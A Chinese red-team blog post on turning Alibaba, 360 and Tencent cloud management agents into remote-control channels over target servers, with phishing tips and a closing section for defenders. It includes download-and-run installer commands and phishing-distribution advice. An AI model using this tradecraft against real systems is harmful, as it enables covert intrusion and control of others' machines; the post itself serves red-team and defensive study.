hvv期间曾曝出过红队利用360企业安全云平台进行钓鱼、利用阿里云平台进行投毒等事件，出于好奇，学习了下这方面相关的知识，分享一下。

上述两个事件就不再赘述，关注过hvv的应该都知道的。笔者从三个云平台进行学习，分别为：阿里云安全中心平台、腾讯云助手、360企业安全云平台。

1阿里云-云安全中心CS

云安全中心介绍

概述

云安全中心是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统，通过防勒索、漏洞扫描修复、防病毒、防篡改、合规检查等安全能力，帮助用户实现威胁检测、响应、溯源的自动化安全运营闭环，保护云上主机、本地服务器和容器安全，并满足监管合规要求。

aliyun安全中心提供终端控制平台和agent，用于监听和控制资产内的主机

agent安装后，会实时向云安全中心服务端上报客户端信息，包括：终端是否在线、终端采集所需数据等

agent运行条件，Linux使用root账号运行、Windows使用system账号权限运行。（这个条件在攻防当中利用妥当，直接不用提权）

安装agent插件后，服务器会自动下载aegis_client和aegis_update文件，并启动进程AliYunDun和AliYunDunUpdate。其它文件和进程只有在开启相应功能后才会下载和启动。

aegis_client功能：该目录下核心进程Aliyundun，用于与云安全中心服务器建立连接；该目录下核心进程AliYunDunMonitor，用于主机安全监控与检测。

文件下载时间：安装Agent插件后，aegis_client文件会下载到服务器中。

文件所在路径： 

Windows 32位系统：C:\Program Files\Alibaba\aegis

Windows 64位系统：C:\Program Files (x86)\Alibaba\aegis

Linux系统：/usr/local/aegis

aegis_update功能：该目录下核心进程为AliYunDunUpdate，用于定期检测云安全中心Agent是否需要升级。

文件下载时间：安装Agent插件后，aegis_update文件会下载到服务器中。 

文件所在路径： 

Windows 32位系统：C:\Program Files\Alibaba\aegis

Windows 64位系统：C:\Program Files (x86)\Alibaba\aegis

Linux系统：/usr/local/aegis

以上两个文件安装Agent时会自动下载，同时还有很多可选文件，需要打开相应功能才能下载，具体见：https://help.aliyun.com/zh/security-center/user-guide/overview-of-the-security-center-agent?spm=a2c4g.11186623.0.0.45e94e842lq0r9

兼容性

Window(32/64)：

• Windows Server 2022
• Windows Server 2019
• Windows Server 2016
• Windows Server 2012
• Windows Server 2008

Linux (64)：

• Alibaba Cloud Linux
• AlmaLinux
• Anolis OS
• CentOS 6、7、8
• CentOS Stream
• Debian 8及以上版本
• Gentoo
• OpenSUSE
• Red Hat 6及以上版本
• RHEL 6、7、8
• Rocky Linux
• SUSE
• Ubuntu 14.04及以上版本

同时该Agent还支持众多不同内核版本的系统，详见：https://help.aliyun.com/zh/security-center/user-guide/overview-of-the-security-center-agent?spm=a2c4g.11186623.0.0.45e94e842lq0r9

从兼容性上看，直接降低了agent安装利用的难度。

Agent安装

一键自动安装Agent

前提条件：

• 服务器为阿里云服务器
• 服务器在运行，且网络无故障
• 服务器使用专有网络
• 服务器不能使用其他第三方安全软件
• 服务器所在地域支持一键安装功能
• 服务器已安装云助手

操作步骤：

1. 登录云安全中心控制台。在控制台左上角，选择需防护资产所在的区域：中国或全球（不含中国）。
2. 在左侧导航栏，选择系统配置 > 功能设置。
3. 在客户端 > 未安装客户端页签，在要安装Agent的服务器的操作列单击安装客户端，为该服务器安装Agent。

您也可以选中多台服务器后单击一键安装，批量安装Agent。

Agent插件安装完成约5分钟后，可在资产中心 > 主机资产 > 服务器页签，查看服务器的客户端在线情况。

这种方式只仅限于目标服务器是阿里云服务器，日常攻防工作当中，非云服务器目标资产还是占大多数的。这种方式不再赘述。

手动安装Agent

该方式为非云服务器上云统一管控提供了解决方案，可以将非云或其他云服务器托管到云安全中心进行统一管理。

1. 登录云安全中心，区域选择全国
2. 系统配置-功能设置-客户端-安装命令

3. 使用管理员权限的账号登录需要安装Agent的服务器，根据操作系统复制安装命令并执行 window命令：

powershell -executionpolicy bypass -c "(New-Object Net.WebClient).DownloadFile('http://aegis.alicdn.com/download/install/2.0/windows/AliAqsInstall.exe', $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath('.\AliAqsInstall.exe'))"; "./AliAqsInstall.exe -k=ogkP11"

linux命令：

wget "https://aegis.alicdn.com/download/install/2.0/linux/AliAqsInstall.sh" && chmod +x AliAqsInstall.sh && ./AliAqsInstall.sh -k=wbk0j6

测试环境ubuntu20.04，执行安装命令后，出现如下信息为安装成功

安装成功后，在云安全中心-主机资产处会显示客户端

注意：安装后，服务器会启动三个进程：AliYunDunUpdate、AliYunDun和AliYunDunMonitor。其中AliYunDunMonitor进程会在其他两个进程启动后的大概10分钟左右启动。没启动前，云安全中心显示离线状态。

此时客户端主机已经上线，不过还无法进行远控，还需要安装云助手（如果服务器是云服务器，可以一键安装，安装后可进行远控）。通过云助手远控客户端。下面了解下云助手的作用和部署方式。

云助手

云助手是专为云服务器ECS打造的原生自动化运维工具，免密码、免登录、无需使用跳板机，即可批量执行命令（Shell、PowerShell、Bat等），实现自动化运维脚本、轮询进程、安装卸载软件、启动或停止服务、安装补丁或安装安全更新等任务。

阿里云设计云助手主要用来操作阿里云服务器使用，但同时，也对非阿里云服务器提供了混合云方案，即使我们的目标不是阿里云服务器，也可以让它上线到云安全中心进行远控。

版本要求：

- Alibaba Cloud Linux 2/3及更高版本
- CentOS 6/7/8及更高版本
- CoreOS
- Debian 8/9/10及更高版本
- OpenSUSE
- RedHat 5/6/7及更高版本
- SUSE Linux Enterprise Server 11/12/15及更高版本
- Ubuntu 12/14/16/18及更高版本
- Window Server 2012/2016/2019及更高版本

安装云助手Agent

步骤一：创建托管实例注册码

云服务器ECS-运维与监控-发送命令/文件（云助手），选择托管实例

如果这里还没有实例，会显示一个创建注册码的提示，因为我已经创建了，所以会显示已经添加的实例，如果需要继续添加，可以点击“注册新实例”。

点击生成注册码后，会出现注册命令，如下图

步骤二：下载并安装agent

根据目标系统，选择可用的命令，并执行

安装完成后，系统会启动一个相关服务 

步骤三：验证安装结果

回到托管实例页面，刷新

点击执行命令 

点击远程控制

2360企业安全云

产品介绍

360企业安全云作为新一代数字安全与管理SaaS服务，基于360安全大脑安全能力，依托全面SaaS架构，实现硬件、软件、数据、资产、上网、防勒索等全方位数字安全与管理服务。从管人员、管资产、管数据三大价值层面助力企业数字化管理提效，对人员身份及行为管理、软、硬资产兼管、数据全链路守护等实现了一体化综合统效，全面赋能企业数字化转型。

详情见：https://b.360.net/product-center/Endpoint-Security/safe-team

安装部署

步骤一：选择部署方式

这里提供三种安装方式：

• 手动下载安装：该方式需管理员自己下载好客户端安装包，并在需要安装客户端的主机上运行。
• 员工自主下载：该方式需要客户端用户自行下载客户端，并安装，需管理员提供下载链接，通过沟通软件或者邮件发送给所需用户。
• 域控分发：管理员通过AD域环境将安装包分发到终端并执行。在指引中提供了分发方案。

在攻防场景中，如果去钓鱼的话，建议使用方式一和方式二（而且该平台还贴心提供了邮件信息模版），如果在内网已经有了一定的权限，可使用方式一和方式三进行远控。

步骤二：安装客户端

该链接是企业专属的下载链接。即按照我创建的链接下载客户端，安装后会加入到我的企业管理后台，被我远控。（hvv钓鱼那个事就是这个方式）

步骤三：进行远控

安装完成后，在远程运维-远程控制，可进行远控，如下图 

局限性

进行远控分为多个方式，如下图 

对于攻防场景来说，远控和执行命令是最为需要的，但是目前360企业安全云，只有PC远程控制可以免费，而且需要被控端同意，才可以远程控制，如下图

这直接增加了被发现的风险。

在该问题上，360企业安全云同样有解决方案：无人值守远程控制，这个不需要确认直接可以远程控制。但是却需要花费一定的大米，看一下花费多少大米 

另外一种方式：远程CMD，花费大米如下 

因为笔者吃不起苕皮，不舍得花费这80米，所以就没办法复现远控的镜头啦（狗头）。对笔者来说确实是局限性。

3腾讯云助手CS

产品简介

概述

自动化助手（TencentCloud Automation Tools，TAT）是云服务器 CVM 和轻量应用服务器 Lighthouse 的原生运维部署工具。自动化助手提供了一种自动化的远程操作方式，无需登录及密码，即可批量执行命令（Shell、PowerShell 及 Python 等），完成运行自动化运维脚本、轮询进程、安装/卸载软件、更新应用及安装补丁等任务。

自动化助手虽然是腾讯云服务运维部署工具，但是也提供了非腾讯云的方案，将非腾讯云机器通过自动化助手注册为腾讯云托管实例。

兼容性

服务器操作系统版本需为：

• TencentOS Server 2/3及更高版本。
• OpenCloudOS Server 8/9及更高版本。
• CentOS 6/7/8、CentOS Stream 8/9及更高版本。
• Ubuntu 14/16/18/20/22及更高版本。
• Debian 8/9/10/11及更高版本。
• RedHat 7/8/9及更高版本。
• 其他 Linux 操作系统版本：CoreOS、Fedora、OpenSUSE、Fedora、FreeBSD、Rocky Linux 等。
• Windows Server 2008/2012/2016/2019/2022 及更高版本。
• 待注册的服务器支持公网访问（直连方式与代理方式均可）。

基本覆盖了常用的服务器版本。

部署

步骤一：生成注册码

1. 云服务器-自动化助手-托管实例 

3. 创建完成后，会生成安装Agent的命令

步骤二：托管实例

1. 使用步骤一中生成的命令，根据目标主机系统版本，选择合适的安装命令并执行

Agent自动生成服务tat_agent.service，并开始执行。

2. 回到腾讯云，查看托管实例列表

3. 执行命令

4免杀效果

通过上述操作不难发现，我们如果想要让目标服务器上线，避免不了安装agent等客户端，那么在安装客户端的时候，会被现有的安全防病毒查杀吗？

云安全中心Agent 

云助手agent 

360 agent

5防守方视角

作为防守方，如果我们的服务器被上述方式控制，我们应该要做哪些工作？如何去防守呢？

首先，可以从进程和服务进行排查。

阿里云安全中心，安装了Agent时，服务器会启动三个进程和一个服务，分别是：AliYunDun、AliYunDunUpdate、AliYunDunMonitor和服务aliyun-service

腾讯云助手，安装自动化助手agent时，系统自动创建tat_agent.service服务，使用systemctl list-units --type=service --state=running 列出所有正在运行的服务

systemctl status tat_agent.service 查看服务状态

同时也可查看进程

其次，阿里云安全中心agent可以从系统添加的用户排查。当安装了云助手时，系统默认添加用户ecs-assist-user,通过查看/etc/passwd进行排查

6待解决问题

1. 以上环境均为非云环境下的服务器，那么如果我们的服务器是对应的云服务器，应当如何排查？

2. 如何对上述利用方法进行有效溯源？